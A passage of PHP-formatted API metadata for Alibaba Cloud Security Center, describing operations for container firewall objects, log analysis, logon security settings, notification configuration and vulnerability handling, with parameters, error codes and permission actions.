'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyInterceptionRuleSwitch'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyInterceptionRuleSwitch', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"DE725A60-95F2-50E8-8F5D-81055215E7DA\\"\\n}","type":"json"}]', ], 'ModifyInterceptionTarget' => [ 'summary' => 'Modifies the network object information of a container firewall.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => ['operationType' => 'update'], 'parameters' => [ [ 'name' => 'TargetId', 'in' => 'query', 'schema' => ['description' => 'The ID of the network object.'."\n" .'>You can call the [ListInterceptionTargetPage](~~ListInterceptionTargetPage~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '400913', 'title' => ''], ], [ 'name' => 'TargetName', 'in' => 'query', 'schema' => ['description' => 'The name.', 'type' => 'string', 'required' => true, 'example' => 'test001', 'title' => ''], ], [ 'name' => 'TargetType', 'in' => 'query', 'schema' => ['description' => 'The target type. Valid values:'."\n" .'- **IMAGE**: image.', 'type' => 'string', 'required' => true, 'example' => 'IMAGE', 'title' => ''], ], [ 'name' => 'Namespace', 'in' => 'query', 'schema' => ['description' => 'The namespace.'."\n" .'>You can call the [DescribeContainerTags](~~DescribeContainerTags~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => 'demo4', 'title' => ''], ], [ 'name' => 'AppName', 'in' => 'query', 'schema' => ['description' => 'The application name.'."\n" .'>You can call the [DescribeContainerTags](~~DescribeContainerTags~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'yasintt-daemonst', 'title' => ''], ], [ 'name' => 'ImageList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of images.'."\n" .'>You can call the [DescribeContainerTags](~~DescribeContainerTags~~) operation to obtain this parameter.', 'type' => 'array', 'items' => ['description' => 'The image.'."\n" .'>You can call the [DescribeContainerTags](~~DescribeContainerTags~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'arms-prom-operator:v0.1', 'title' => ''], 'required' => false, 'maxItems' => 1000, 'title' => '', 'example' => '', ], ], [ 'name' => 'TagList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of labels.'."\n" .'>You can call the [DescribeContainerTags](~~DescribeContainerTags~~) operation to obtain this parameter.', 'type' => 'array', 'items' => ['description' => 'The label.'."\n" .'>You can call the [DescribeContainerTags](~~DescribeContainerTags~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'app.kubernetes.io/component:query', 'title' => ''], 'required' => false, 'maxItems' => 1000, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'Result' => ['description' => 'The result of the request. Valid values:'."\n" .'- **true**: The request was processed successfully.'."\n" .'- **false**: The request failed to be processed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '16CB4467-56AE-546C-BF19-AD4584C0DD03', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Modify container firewall network object', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyInterceptionTarget'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyInterceptionTarget', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Result\\": true,\\n \\"RequestId\\": \\"16CB4467-56AE-546C-BF19-AD4584C0DD03\\"\\n}","type":"json"}]', ], 'ModifyLogMetaStatus' => [ 'summary' => 'Modifies the enabling status of log analysis.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '154030', 'abilityTreeNodes' => ['FEATUREsasA2G5MU'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'From', 'in' => 'query', 'schema' => ['description' => 'The request source identifier. Set this parameter to **sas**.', 'type' => 'string', 'required' => false, 'example' => 'sas', 'title' => ''], ], [ 'name' => 'Project', 'in' => 'query', 'schema' => ['description' => 'The project name.'."\n" .'> You can call the [DescribeLogMeta](~~DescribeLogMeta~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'aegis-log', 'title' => ''], ], [ 'name' => 'LogStore', 'in' => 'query', 'schema' => ['description' => 'The name of the dedicated Logstore where logs are stored.'."\n" .'>You can call the [DescribeLogMeta](~~DescribeLogMeta~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => 'aegis-log-login'."\n", 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The status to which you want to change the log. Valid values:'."\n" .'- **enabled**: enabled'."\n" .'- **disabled**: disabled.', 'type' => 'string', 'required' => true, 'example' => 'disabled', 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The ID of the member account in the resource directory (Alibaba Cloud account).'."\n" .'>Call the [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1232428423234****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '861445A7-B6D6-5825-B015-CD46ED90613A', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'LogAuthStatusNotReady', 'errorMessage' => 'Insufficient authorization status of the log service.', 'description' => ''], ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Modify log analysis enabling status', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '20', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyLogMetaStatus'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyLogMetaStatus', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"861445A7-B6D6-5825-B015-CD46ED90613A\\"\\n}","type":"json"}]', ], 'ModifyLoginBaseConfig' => [ 'summary' => 'Modifies the basic configuration of logon security settings for a single asset.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '92374', 'abilityTreeNodes' => ['FEATUREsasGC725T'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of unusual logon detection for the server. Valid values:'."\n" ."\n" .'- **login\\_common\\_location**: common logon location.'."\n" .'- **login\\_common\\_ip**: common logon IP address.'."\n" .'- **login\\_common\\_time**: common logon time.'."\n" .'- **login\\_common\\_account**: common logon account.', 'type' => 'string', 'required' => true, 'example' => 'login_common_location', 'title' => ''], ], [ 'name' => 'Config', 'in' => 'query', 'schema' => ['description' => 'The detailed configuration of the unusual logon detection rule for the server. This parameter is in JSON format and contains the following fields:'."\n" ."\n" .'- **totalCount**: the total number of assets.'."\n" .'- **uuidCount**: the number of assets on which the rule takes effect.'."\n" .'- **id**: the ID of the unusual logon detection rule.'."\n" .'- **location**: the name of the common logon location.'."\n" ."\n" .'> This field is required only when the Type parameter is set to login\\_common_location.'."\n" ."\n" .'- **ip**: the common logon IP address.'."\n" ."\n" .'> This field is required only when the Type parameter is set to login\\_common_ip.'."\n" ."\n" .'- **endTime**: the end time of the common logon time range.'."\n" ."\n" .'> This field is required only when the Type parameter is set to login\\_common_time.'."\n" ."\n" .'- **startTime**: the start time of the common logon time range.'."\n" ."\n" .'> This field is required only when the Type parameter is set to login\\_common_time.'."\n" ."\n" .'- **account**: the common logon account.'."\n" ."\n" .'> This field is required only when the Type parameter is set to login\\_common_account.', 'type' => 'string', 'required' => true, 'example' => '{"totalCount":174,"uuidCount":4,"location":"黑山","id":0}', 'title' => ''], ], [ 'name' => 'Target', 'in' => 'query', 'schema' => ['description' => 'The configuration of the servers on which the unusual logon detection rule takes effect. This parameter is in JSON format and contains the following fields:'."\n" ."\n" .'- **Target**: the UUID of the server to add or remove.'."\n" .'- **targetType**: the mode for adding assets on which the rule takes effect. Valid values:'."\n" .' - **uuid**: add by individual server.'."\n" .' - **groupId**: add by server group.'."\n" .'- **flag**: the operation to perform on the asset. Valid values:'."\n" .' - **del**: remove the server from the rule.'."\n" .' - **add**: add the server to the rule.', 'type' => 'string', 'required' => true, 'example' => '[{"target":"inet-7c676676-06fa-442e-90fb-b802e5d6****","targetType":"uuid","flag":"add"}]', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'AB96FDDF-ED29-52B1-9FAE-8203F2808F24', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure. You can use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The response message.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'Success' => ['description' => 'Indicates whether the API call was successful. Valid values:'."\n" .'- **true**: successful.'."\n" .'- **false**: failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'DataNotExists', 'errorMessage' => '%s data not exist', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Modify basic logon security settings for a single asset', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyLoginBaseConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyLoginBaseConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"AB96FDDF-ED29-52B1-9FAE-8203F2808F24\\",\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"Success\\": true\\n}","type":"json"}]', ], 'ModifyLoginSwitchConfig' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '92375', 'abilityTreeNodes' => ['FEATUREsasGC725T'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Item', 'in' => 'query', 'schema' => ['description' => 'The type of the logon security settings that you want to enable or disable. Valid values:'."\n" ."\n" .'* **login\\_common_ip**: unapproved logon IP addresses'."\n" .'* **login\\_common_time**: unapproved logon time ranges'."\n" .'* **login\\_common_account**: unapproved logon accounts', 'type' => 'string', 'required' => true, 'example' => 'login_common_account', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to enable the logon security settings. Valid values:'."\n" ."\n" .'* **0**: no'."\n" .'* **1**: yes'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '0', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'B256A525-7E42-4BB9-A27C-9017FDDFF1A2', 'title' => ''], ], 'description' => 'The data returned.', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'DataExists', 'errorMessage' => 'data exist', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'ModifyLoginSwitchConfig', 'summary' => 'Enables or disables the logon security settings for a specific asset.', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyLoginSwitchConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyLoginSwitchConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"RequestId\\": \\"B256A525-7E42-4BB9-A27C-9017FDDFF1A2\\"\\n}","errorExample":""},{"type":"xml","example":"\\r\\n B256A525-7E42-4BB9-A27C-9017FDDFF1A2\\r\\n","errorExample":""}]', ], 'ModifyNoticeConfig' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92377', 'abilityTreeNodes' => ['FEATUREsasNB8R24'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '42.178.XX.XX', 'title' => ''], ], [ 'name' => 'Route', 'in' => 'query', 'schema' => ['description' => '### Notification method'."\n" ."\n" .'#### When BizType is empty'."\n" .'- 0: disabled'."\n" .'- 1: SMS enabled'."\n" .'- 2: email enabled'."\n" .'- 4: internal message enabled'."\n" .'- 3: SMS and email enabled'."\n" .'- 5: SMS and internal message enabled'."\n" .'- 6: email and internal message enabled'."\n" .'- 7: SMS, email, and internal message all enabled'."\n" ."\n" .'#### When BizType is `cms`'."\n" .'- 0: CloudMonitor push disabled'."\n" .'- 1: CloudMonitor push enabled.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '4', 'title' => ''], ], [ 'name' => 'Project', 'in' => 'query', 'schema' => ['description' => '### Project identity'."\n" ."\n" .'#### When the BizType field is empty: valid values'."\n" .'- **yundun_security_Weekreport**: Security weekly report (email only)'."\n" .'- **sas_healthcheck**: Baseline check'."\n" .'- **yundun_defennce_antiRansomware_overflow**: Anti-ransomware storage space exceeded'."\n" .'- **yundun_sas_cloudsiem_log**: Cloud Threat Detection and Response (CTDR) log excess notification'."\n" .'- **sas_suspicious**: Security alert'."\n" .'- **yundun_aegis_AV_true**: Precise defense'."\n" .'- **yundun_sas_ak_leakage AccessKey**: AccessKey leak intelligence'."\n" .'- **yundun_sas_config_alert**: Cloud platform configuration check'."\n" .'- **yundun_sas_vul_Emergency**: Emergency vulnerability intelligence'."\n" .'- **yundun_webguard_event**: Web tamper-proofing'."\n" .'- **yundun_sas_cloud_native_firewall**: Container firewall anomaly alert notification (email only)'."\n" .'- **yundun_sas_cloud_native_firewall_Defense**: Container firewall active defense notification (email only)'."\n" .'- **yundun_IP_Blocking**: Malicious IP blocking alerting notification'."\n" .'- **yundun_sas_anti_virus_config**: Virus scan notification'."\n" .'- **yundun_sas_log**: Log storage exceeded'."\n" .'- **yundun_honeypot_alarm**: Cloud honeypot alerting'."\n" .'- **aliyun_rasp_alarm**: Application protection alerting'."\n" .'- **yundun_soar_incident_generate**: New security incident'."\n" .'- **yundun_soar_incident_update**: Updated security incident'."\n" .'> **yundun_security_Weekreport** sends a weekly report to notify you of unresolved vulnerabilities.'."\n" ."\n" .'---'."\n" ."\n" .'#### When the BizType field is `cms`: valid values'."\n" .'- **Vul_event**: Vulnerability result details'."\n" .'- **Hc_summary**: Baseline check result summary'."\n" .'- **Cspm_summary**: Cloud Security Posture Management (CSPM) result summary'."\n" .'- **Vul_summary**: Vulnerability result summary'."\n" .'- **Agentless_event**: Agentless detection result details'."\n" .'- **Filedetect_event**: Malicious file SDK result details'."\n" .'- **Rasp_event**: Application protection result details.', 'type' => 'string', 'required' => false, 'example' => 'yundun_webguard_event', 'title' => ''], ], [ 'name' => 'TimeLimit', 'in' => 'query', 'schema' => ['description' => '### Notification time limit'."\n" ."\n" .'#### When the BizType field is empty: valid values'."\n" .'- **0**: No limit.'."\n" .'- **1**: Notifications are sent only between 08:00 and 22:00.'."\n" ."\n" .'#### When the BizType field is `cms`'."\n" .'Specifies the push frequency limit, in seconds. The minimum value is **60**.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'FocusLevel', 'in' => 'query', 'schema' => ['description' => 'The focus level. Separate multiple levels with commas (,).'."\n" ."\n" .'When **Project** is **yundun_soar_incident_generate** or **yundun_soar_incident_update**, valid values:'."\n" ."\n" .'- **CRITICAL**: Critical.'."\n" .'- **HIGH**: High-risk.'."\n" .'- **MEDIUM**: Medium-risk.'."\n" .'- **LOW**: Low-risk.'."\n" .'- **INFO**: Informational.'."\n" ."\n" .'When **Project** is **yundun_sas_antiransomware_task**, valid values:'."\n" ."\n" .'- **Success**: Execution succeeded.'."\n" .'- **Failed**: Execution failed.', 'type' => 'string', 'required' => false, 'example' => 'CRITICAL,HIGH', 'title' => ''], ], [ 'name' => 'BizType', 'in' => 'query', 'schema' => ['description' => 'The notification configuration type. By default, notifications are sent by SMS, email, or internal message. Valid values:'."\n" ."\n" .'- **cms**: CloudMonitor push.', 'type' => 'string', 'required' => false, 'example' => 'cms', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. It is a unique identifier generated by Alibaba Cloud for the request and can be used for troubleshooting.', 'type' => 'string', 'example' => '5989D067-621F-51E2-A636-D94D1388****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Modify notification configuration', 'summary' => 'Modifies notification configuration information.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyNoticeConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyNoticeConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"5989D067-621F-51E2-A636-D94D1388****\\"\\n}","type":"json"}]', ], 'ModifyOpenLogShipper' => [ 'summary' => 'Activates Simple Log Service.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92378', 'abilityTreeNodes' => ['FEATUREsasA2G5MU'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'From', 'in' => 'query', 'schema' => ['description' => 'The identifier of the request source. Default value: **aegis**. Valid values:'."\n" ."\n" .'- **aegis**: Server Guard edition.'."\n" .'- **sas**: Security Center edition.'."\n" ."\n" .'> Server Guard users must use **aegis**, and Security Center users must use **sas**.', 'type' => 'string', 'required' => false, 'example' => 'sas', 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The ID of the member accounts in the resource directory (Alibaba Cloud account).'."\n" .'> You can call the [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '127608589417****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '25EC270F-5783-4416-AD7C-1EDF063A039C', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalHotTTL', 'errorMessage' => 'The hot storage TTL is invalid.', 'description' => ''], ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Activate simple log service', 'description' => '**Before you begin**'."\n" ."\n" .'Activate [Simple Log Service](https://help.aliyun.com/document_detail/48863.html)'."\n" .'[Log Service](https://www.alibabacloud.com/help/en/log-service/latest/billable-items).'."\n" .'Create a service-linked role and authorize Security Center to access cloud resources. You can call the [CreateServiceLinkedRole](~~CreateServiceLinkedRole~~) operation to create a service-linked role and authorize Security Center to access cloud resources.'."\n" ."\n" .'**Common scenarios**'."\n" ."\n" .'Before you use the log analysis feature of Security Center, call the [ModifyOpenLogShipper](~~ModifyOpenLogShipper~~) operation to activate Simple Log Service.', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyOpenLogShipper'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyOpenLogShipper', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'LogShipper', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:logshipper'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"25EC270F-5783-4416-AD7C-1EDF063A039C\\"\\n}","type":"json"}]', ], 'ModifyOperateVul' => [ 'summary' => 'Handles detected vulnerabilities. You can fix, check, or ignore the vulnerabilities.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '92379', 'abilityTreeNodes' => ['FEATUREsasU76LC1'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Info', 'in' => 'query', 'schema' => ['description' => 'The details of the vulnerability. The value of this parameter is in the JSON format and contains the following fields:'."\n" ."\n" .'* **name**: the name of the vulnerability.'."\n" ."\n" .'* **uuid**: the UUID of the server on which the vulnerability is detected.'."\n" ."\n" .'* **tag**: the tag that is added to the vulnerability. Valid values:'."\n" ."\n" .' * **oval**: Linux software vulnerability'."\n" .' * **system**: Windows system vulnerability'."\n" .' * **cms**: Web-CMS vulnerability'."\n" ."\n" .'> You can call the [DescribeVulList](~~DescribeVulList~~) operation to query the tags that are added to vulnerabilities of other types.'."\n" ."\n" .'* **isFront**: specifies whether a pre-patch is required to fix the Windows system vulnerability. This field is required only for Windows system vulnerabilities. Valid values:'."\n" ."\n" .' * **0**: no'."\n" .' * **1**: yes'."\n" ."\n" .'> You can fix multiple vulnerabilities at a time. Separate the details of multiple vulnerabilities with commas (,). You can call the [DescribeVulLIst](~~DescribeVulList~~) operation to query the details of vulnerabilities.'."\n", 'type' => 'string', 'required' => true, 'example' => '[{"name":"alilinux2:2.1903:ALINUX2-SA-2022:0007","uuid":"a3bb82a8-a3bd-4546-acce-45ac34af****","tag":"oval","isFront":0},{"name":"alilinux2:2.1903:ALINUX2-SA-2022:0007","uuid":"98a6fecc-88cd-46f2-8e35-f808a388****","tag":"oval","isFront":0}]', 'title' => ''], ], [ 'name' => 'OperateType', 'in' => 'query', 'schema' => ['description' => 'The operation that you want to perform on the vulnerability. Valid values:'."\n" ."\n" .'* **vul_fix**: fixes the vulnerability.'."\n" .'* **vul_verify**: verifies the vulnerability fix.'."\n" .'* **vul_ignore**: ignores the vulnerability.'."\n" .'* **vul\\_undo_ignore**: cancels ignoring the vulnerability.'."\n" .'* **vul_delete**: deletes the vulnerability.', 'type' => 'string', 'required' => true, 'example' => 'vul_fix', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of the vulnerability. Valid values:'."\n" ."\n" .'* **cve**: Linux software vulnerability'."\n" .'* **sys**: Windows system vulnerability'."\n" .'* **cms**: Web-CMS vulnerability'."\n" .'* **emg**: urgent vulnerability'."\n" .'* **app**: application vulnerability'."\n" .'* **sca**: vulnerability that is detected based on software component analysis'."\n" ."\n" .'> You cannot fix the urgent vulnerabilities, application vulnerabilities, or vulnerabilities that are detected based on software component analysis.'."\n", 'type' => 'string', 'required' => true, 'example' => 'cve', 'title' => ''], ], [ 'name' => 'Reason', 'in' => 'query', 'schema' => ['description' => 'The reason why the vulnerability is **ignored**.'."\n" ."\n" .'> This parameter is required only when you set **OperateType** to **vul_ignore**.'."\n", 'type' => 'string', 'required' => false, 'example' => 'not operate', 'title' => ''], ], [ 'name' => 'From', 'in' => 'query', 'schema' => ['description' => 'The request ID. Set the value to **sas**.'."\n", 'type' => 'string', 'required' => false, 'example' => 'sas', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'DFE4F166-1AC9-4FAC-A4E4-F0608AD705A6', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'InsufficientAuthorizationCount', 'errorMessage' => 'Authorization count is insufficient.', 'description' => ''], ['errorCode' => 'UnauthorizedMachineNotSupportFix', 'errorMessage' => 'Unauthorized machines do not support vulnerability fixing.', 'description' => ''], ['errorCode' => 'UserInstanceVersionNotSupportFix', 'errorMessage' => 'Vulnerability fixing is not supported for the instance version.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'ModifyOperateVul', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyOperateVul'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyOperateVul', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => 